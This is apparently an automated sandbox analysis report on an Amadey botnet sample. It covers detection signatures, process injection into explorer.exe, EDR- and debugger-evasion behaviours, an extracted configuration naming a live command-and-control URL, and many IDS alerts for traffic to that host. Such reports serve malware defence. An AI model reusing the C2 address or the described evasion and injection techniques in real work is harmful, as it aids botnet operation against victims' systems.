Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
pTvHtQDXio.exe

Overview

General Information

Sample name:pTvHtQDXio.exe
renamed because original name is a hash value
Original sample name:7c23cca92ddabc20911e0c51e19b002b.exe
Analysis ID:1576147
MD5:7c23cca92ddabc20911e0c51e19b002b
SHA1:f0e07a68ca36681ece42c23d75351d51a9b52a8c
SHA256:471f22db8436b846bcc1b8d9691adb74d02cee7b49e4a58772f486ece4ca19db
Tags:Amadeyexeuser-abuse_ch
Infos:

Detection

Amadey
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Amadeys Clipper DLL
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to start a terminal service
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • pTvHtQDXio.exe (PID: 8060 cmdline: "C:\Users\user\Desktop\pTvHtQDXio.exe" MD5: 7C23CCA92DDABC20911E0C51E19B002B)
    • more.com (PID: 8132 cmdline: C:\Windows\SysWOW64\more.com MD5: 03805AE7E8CBC07840108F5C80CF4973)
      • conhost.exe (PID: 8140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • explorer.exe (PID: 2972 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
  • comet.exe (PID: 7580 cmdline: C:\Users\user\AppData\Roaming\ancar\comet.exe MD5: 7C23CCA92DDABC20911E0C51E19B002B)
    • WerFault.exe (PID: 2896 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7580 -s 640 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Malware Configuration

Threatname: Amadey

{"C2 url": "62.60.226.15/8fj482jd9/index.php", "Version": "5.10", "Install Folder": "f39a3c5206", "Install File": "Gxtuum.exe"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\nlhiojbrJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000002.00000002.1577858534.0000000005CD0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.more.com.5cd00c8.7.unpackJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
        10.2.explorer.exe.3200000.0.unpackJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
          2.2.more.com.5cd00c8.7.raw.unpackJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-16T15:26:45.224974+010028561471A Network Trojan was detected192.168.2.104971462.60.226.1580TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-16T15:26:48.353310+010028561481A Network Trojan was detected192.168.2.104971562.60.226.1580TCP
            2024-12-16T15:26:54.291473+010028561481A Network Trojan was detected192.168.2.104971962.60.226.1580TCP
            2024-12-16T15:27:00.400999+010028561481A Network Trojan was detected192.168.2.104972462.60.226.1580TCP
            2024-12-16T15:27:06.394649+010028561481A Network Trojan was detected192.168.2.104972962.60.226.1580TCP
            2024-12-16T15:27:12.443161+010028561481A Network Trojan was detected192.168.2.104973162.60.226.1580TCP
            2024-12-16T15:27:18.378506+010028561481A Network Trojan was detected192.168.2.104973362.60.226.1580TCP
            2024-12-16T15:27:24.316666+010028561481A Network Trojan was detected192.168.2.104973662.60.226.1580TCP
            2024-12-16T15:27:30.416977+010028561481A Network Trojan was detected192.168.2.104973862.60.226.1580TCP
            2024-12-16T15:27:36.331229+010028561481A Network Trojan was detected192.168.2.104974062.60.226.1580TCP
            2024-12-16T15:27:44.971085+010028561481A Network Trojan was detected192.168.2.104974262.60.226.1580TCP
            2024-12-16T15:27:50.897185+010028561481A Network Trojan was detected192.168.2.104974562.60.226.1580TCP
            2024-12-16T15:27:56.847198+010028561481A Network Trojan was detected192.168.2.104974762.60.226.1580TCP
            2024-12-16T15:28:02.875484+010028561481A Network Trojan was detected192.168.2.104974962.60.226.1580TCP
            2024-12-16T15:28:08.862170+010028561481A Network Trojan was detected192.168.2.104975162.60.226.1580TCP
            2024-12-16T15:28:14.913330+010028561481A Network Trojan was detected192.168.2.104975362.60.226.1580TCP
            2024-12-16T15:28:20.870653+010028561481A Network Trojan was detected192.168.2.104975562.60.226.1580TCP
            2024-12-16T15:28:26.839464+010028561481A Network Trojan was detected192.168.2.104975762.60.226.1580TCP
            2024-12-16T15:28:32.799344+010028561481A Network Trojan was detected192.168.2.104975962.60.226.1580TCP
            2024-12-16T15:28:38.754130+010028561481A Network Trojan was detected192.168.2.104976162.60.226.1580TCP
            2024-12-16T15:28:44.747663+010028561481A Network Trojan was detected192.168.2.104976362.60.226.1580TCP
            2024-12-16T15:28:50.703438+010028561481A Network Trojan was detected192.168.2.104976562.60.226.1580TCP
            2024-12-16T15:28:56.644659+010028561481A Network Trojan was detected192.168.2.104976762.60.226.1580TCP
            2024-12-16T15:29:02.594430+010028561481A Network Trojan was detected192.168.2.104976962.60.226.1580TCP
            2024-12-16T15:29:08.634245+010028561481A Network Trojan was detected192.168.2.104977162.60.226.1580TCP
            2024-12-16T15:29:14.555622+010028561481A Network Trojan was detected192.168.2.104977362.60.226.1580TCP
            2024-12-16T15:29:20.475157+010028561481A Network Trojan was detected192.168.2.104977562.60.226.1580TCP
            2024-12-16T15:29:26.426738+010028561481A Network Trojan was detected192.168.2.104977762.60.226.1580TCP
            2024-12-16T15:29:32.365433+010028561481A Network Trojan was detected192.168.2.104977962.60.226.1580TCP
            2024-12-16T15:29:38.291763+010028561481A Network Trojan was detected192.168.2.104978162.60.226.1580TCP
            2024-12-16T15:29:44.244429+010028561481A Network Trojan was detected192.168.2.104978362.60.226.1580TCP
            2024-12-16T15:29:50.245706+010028561481A Network Trojan was detected192.168.2.104978562.60.226.1580TCP
            2024-12-16T15:29:56.163704+010028561481A Network Trojan was detected192.168.2.104978762.60.226.1580TCP
            2024-12-16T15:30:02.089631+010028561481A Network Trojan was detected192.168.2.104978962.60.226.1580TCP
            2024-12-16T15:30:08.182139+010028561481A Network Trojan was detected192.168.2.104979162.60.226.1580TCP
            2024-12-16T15:30:14.166027+010028561481A Network Trojan was detected192.168.2.104979362.60.226.1580TCP
            2024-12-16T15:30:20.087650+010028561481A Network Trojan was detected192.168.2.104979562.60.226.1580TCP
            2024-12-16T15:30:26.007164+010028561481A Network Trojan was detected192.168.2.104979762.60.226.1580TCP
            2024-12-16T15:30:31.953635+010028561481A Network Trojan was detected192.168.2.104979962.60.226.1580TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-16T15:26:45.224974+010028560971A Network Trojan was detected192.168.2.104971462.60.226.1580TCP
            2024-12-16T15:26:51.362062+010028560971A Network Trojan was detected192.168.2.104971762.60.226.1580TCP
            2024-12-16T15:26:57.320156+010028560971A Network Trojan was detected192.168.2.104972162.60.226.1580TCP
            2024-12-16T15:27:03.413713+010028560971A Network Trojan was detected192.168.2.104972662.60.226.1580TCP
            2024-12-16T15:27:09.529479+010028560971A Network Trojan was detected192.168.2.104973062.60.226.1580TCP
            2024-12-16T15:27:15.474901+010028560971A Network Trojan was detected192.168.2.104973262.60.226.1580TCP
            2024-12-16T15:27:21.399440+010028560971A Network Trojan was detected192.168.2.104973562.60.226.1580TCP
            2024-12-16T15:27:27.406642+010028560971A Network Trojan was detected192.168.2.104973762.60.226.1580TCP
            2024-12-16T15:27:33.426547+010028560971A Network Trojan was detected192.168.2.104973962.60.226.1580TCP
            2024-12-16T15:27:39.344102+010028560971A Network Trojan was detected192.168.2.104974162.60.226.1580TCP
            2024-12-16T15:27:47.992324+010028560971A Network Trojan was detected192.168.2.104974462.60.226.1580TCP
            2024-12-16T15:27:53.914198+010028560971A Network Trojan was detected192.168.2.104974662.60.226.1580TCP
            2024-12-16T15:27:59.914671+010028560971A Network Trojan was detected192.168.2.104974862.60.226.1580TCP
            2024-12-16T15:28:05.950272+010028560971A Network Trojan was detected192.168.2.104975062.60.226.1580TCP
            2024-12-16T15:28:11.888302+010028560971A Network Trojan was detected192.168.2.104975262.60.226.1580TCP
            2024-12-16T15:28:17.950542+010028560971A Network Trojan was detected192.168.2.104975462.60.226.1580TCP
            2024-12-16T15:28:23.925340+010028560971A Network Trojan was detected192.168.2.104975662.60.226.1580TCP
            2024-12-16T15:28:29.870544+010028560971A Network Trojan was detected192.168.2.104975862.60.226.1580TCP
            2024-12-16T15:28:35.817002+010028560971A Network Trojan was detected192.168.2.104976062.60.226.1580TCP
            2024-12-16T15:28:41.845113+010028560971A Network Trojan was detected192.168.2.104976262.60.226.1580TCP
            2024-12-16T15:28:47.798530+010028560971A Network Trojan was detected192.168.2.104976462.60.226.1580TCP
            2024-12-16T15:28:53.721470+010028560971A Network Trojan was detected192.168.2.104976662.60.226.1580TCP
            2024-12-16T15:28:59.674367+010028560971A Network Trojan was detected192.168.2.104976862.60.226.1580TCP
            2024-12-16T15:29:05.614851+010028560971A Network Trojan was detected192.168.2.104977062.60.226.1580TCP
            2024-12-16T15:29:11.647684+010028560971A Network Trojan was detected192.168.2.104977262.60.226.1580TCP
            2024-12-16T15:29:17.565382+010028560971A Network Trojan was detected192.168.2.104977462.60.226.1580TCP
            2024-12-16T15:29:23.497436+010028560971A Network Trojan was detected192.168.2.104977662.60.226.1580TCP
            2024-12-16T15:29:29.457152+010028560971A Network Trojan was detected192.168.2.104977862.60.226.1580TCP
            2024-12-16T15:29:35.385154+010028560971A Network Trojan was detected192.168.2.104978062.60.226.1580TCP
            2024-12-16T15:29:41.307857+010028560971A Network Trojan was detected192.168.2.104978262.60.226.1580TCP
            2024-12-16T15:29:47.343687+010028560971A Network Trojan was detected192.168.2.104978462.60.226.1580TCP
            2024-12-16T15:29:53.259229+010028560971A Network Trojan was detected192.168.2.104978662.60.226.1580TCP
            2024-12-16T15:29:59.176037+010028560971A Network Trojan was detected192.168.2.104978862.60.226.1580TCP
            2024-12-16T15:30:05.282733+010028560971A Network Trojan was detected192.168.2.104979062.60.226.1580TCP
            2024-12-16T15:30:11.266405+010028560971A Network Trojan was detected192.168.2.104979262.60.226.1580TCP
            2024-12-16T15:30:17.187703+010028560971A Network Trojan was detected192.168.2.104979462.60.226.1580TCP
            2024-12-16T15:30:23.097527+010028560971A Network Trojan was detected192.168.2.104979662.60.226.1580TCP
            2024-12-16T15:30:29.047734+010028560971A Network Trojan was detected192.168.2.104979862.60.226.1580TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Found malware configuration
            Source: 00000002.00000002.1577858534.0000000005CD0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Amadey {"C2 url": "62.60.226.15/8fj482jd9/index.php", "Version": "5.10", "Install Folder": "f39a3c5206", "Install File": "Gxtuum.exe"}
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\nlhiojbrReversingLabs: Detection: 50%
            Multi AV Scanner detection for submitted file
            Source: pTvHtQDXio.exeReversingLabs: Detection: 50%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\nlhiojbrJoe Sandbox ML: detected
            Source: pTvHtQDXio.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: pTvHtQDXio.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: wntdll.pdbUGP source: pTvHtQDXio.exe, 00000000.00000002.1463469502.0000000005360000.00000004.00000800.00020000.00000000.sdmp, pTvHtQDXio.exe, 00000000.00000002.1460844166.0000000004B53000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576734242.0000000005200000.00000004.00001000.00020000.00000000.sdmp, more.com, 00000002.00000002.1576008182.0000000004D71000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894571477.0000000004F5E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3895341723.00000000053E0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: pTvHtQDXio.exe, 00000000.00000002.1463469502.0000000005360000.00000004.00000800.00020000.00000000.sdmp, pTvHtQDXio.exe, 00000000.00000002.1460844166.0000000004B53000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576734242.0000000005200000.00000004.00001000.00020000.00000000.sdmp, more.com, 00000002.00000002.1576008182.0000000004D71000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894571477.0000000004F5E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3895341723.00000000053E0000.00000004.00001000.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
            Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
            Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
            Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
            Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
            Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
            Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
            Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
            Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
            Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
            Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
            Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
            Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
            Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
            Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
            Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_0323F271 FindFirstFileExW,10_2_0323F271

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49714 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.10:49714 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49717 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49735 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49726 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49724 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49729 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49742 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49749 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49747 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49738 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49745 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49748 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49740 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49739 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49750 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49755 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49762 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49731 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49760 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49753 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49765 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49754 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49756 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49773 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49770 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49775 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49761 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49766 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49780 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49781 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49767 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49779 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49796 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49785 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49794 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49790 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49774 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49789 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49792 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49793 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49791 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49759 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49788 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49784 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49787 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49797 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49795 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49777 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49783 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49799 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49776 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49758 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49719 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49782 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49730 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49771 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49763 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49721 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49746 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49751 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49732 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49769 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49778 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49736 -> 62.60.226.15:80
            Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49764 -> 62.60.226.15:80
